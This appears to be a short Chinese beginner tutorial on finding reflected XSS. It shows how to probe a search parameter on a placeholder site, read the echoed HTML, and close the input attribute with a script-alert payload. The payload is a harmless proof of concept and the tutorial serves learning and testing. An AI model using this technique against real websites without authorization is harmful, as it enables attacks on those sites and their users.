xss学习之查找xss（一）

从本章开始学习xss

如何查找xss：

拿到一个网站之后，随便找一个页面测试下

http://xss.com/product/product_searchProducts.action?productName=111

查看页面源代码为：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"/>

添加一些变形，随便写（这里主要是看页面时如何构造语句的）：

把111变为： 111'</a

http://xss.com/product/product_searchProducts.action?productName=111'</a

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111'</a"/>

可以看到111前面有个" 在/a后面还有” 这个是系统自动加的，然后系统自动增加了 />

构造xss为：首先闭合掉最开头的< 需要提交参数的时候先使用> 闭合掉

尝试提交 111><script>alert('a')</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111><script>alert('a')</script>"/>

可以看到在</script>之后自动添加了"/>

这个”是跟提交数据一起的，也需要在一开始就闭合

尝试： 111"><script>alert('a')</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"><script>alert('a')</script>"/>

此时前面该闭合的都已经闭合了，最后留下了xss代码执行成功，会弹出一个对话框，内容为“a”

相关阅读:
寒假学习日报20
寒假学习日报19
Centos firewalld开放端口
Full GC回收详解
JVM调优6大步骤
JVM的方法区和永久带是什么关系？
sql优化的几种方式
sentinel-dashboard安装、运行（ubuntu）
RocketMQ工作原理
linux：nohup 不生成 nohup.out的方法

原文地址：https://www.cnblogs.com/luyg24/p/4284954.html